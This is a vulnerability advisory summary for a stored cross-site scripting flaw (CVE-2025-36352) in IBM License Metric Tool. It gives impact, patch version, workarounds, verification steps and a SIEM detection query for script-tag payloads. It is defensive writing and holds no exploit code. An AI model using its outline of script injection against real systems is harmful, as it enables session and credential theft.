CVE-2025-36352
📋 TL;DR
IBM License Metric Tool versions 9.2.0 through 9.2.40 contain a stored cross-site scripting vulnerability that allows authenticated users to inject malicious JavaScript into the web interface. This could lead to session hijacking or credential theft when other users view the compromised content. Only authenticated users can exploit this vulnerability.
💻 Affected Systems
- IBM License Metric Tool
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
An attacker could steal administrator credentials, gain full control of the system, and potentially pivot to other systems in the network.
Likely Case
Attackers steal session cookies or credentials from users who view the malicious content, leading to unauthorized access to the License Metric Tool.
If Mitigated
With proper input validation and output encoding, the malicious scripts would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Requires authenticated access and knowledge of how to inject scripts into the web interface. No public exploit code is known at this time.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.2.41 or later
Vendor Advisory: https://www.ibm.com/support/pages/node/7246534
Restart Required: No
Instructions:
1. Download IBM License Metric Tool version 9.2.41 or later from IBM Fix Central. 2. Follow IBM's upgrade documentation for your specific deployment. 3. Verify the installation completes successfully.
🔧 Temporary Workarounds
Input Validation Enhancement
allImplement additional input validation on all user-controllable fields to reject or sanitize JavaScript content.
Content Security Policy
allImplement a strict Content Security Policy header to restrict script execution sources.
🧯 If You Can't Patch
- Restrict user permissions to minimize who can create or modify content in the web interface.
- Implement web application firewall rules to detect and block XSS payloads.
🔍 How to Verify
Check if Vulnerable:
Check the IBM License Metric Tool version via the web interface or installation directory. If version is between 9.2.0 and 9.2.40 inclusive, the system is vulnerable.Check Version:
Check the 'About' section in the web interface or examine the installation directory for version files.Verify Fix Applied:
After patching, verify the version shows 9.2.41 or later. Test by attempting to inject basic script tags into user-controllable fields to confirm they are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests containing script tags or JavaScript code to web interface endpoints
- Multiple failed login attempts followed by successful authentication and content modification
Network Indicators:
- HTTP requests containing suspicious script payloads in parameters or body
- Unusual outbound connections from the License Metric Tool server
SIEM Query:
source="ibm_license_tool" AND (http_request_body CONTAINS "<script>" OR http_request_body CONTAINS "javascript:")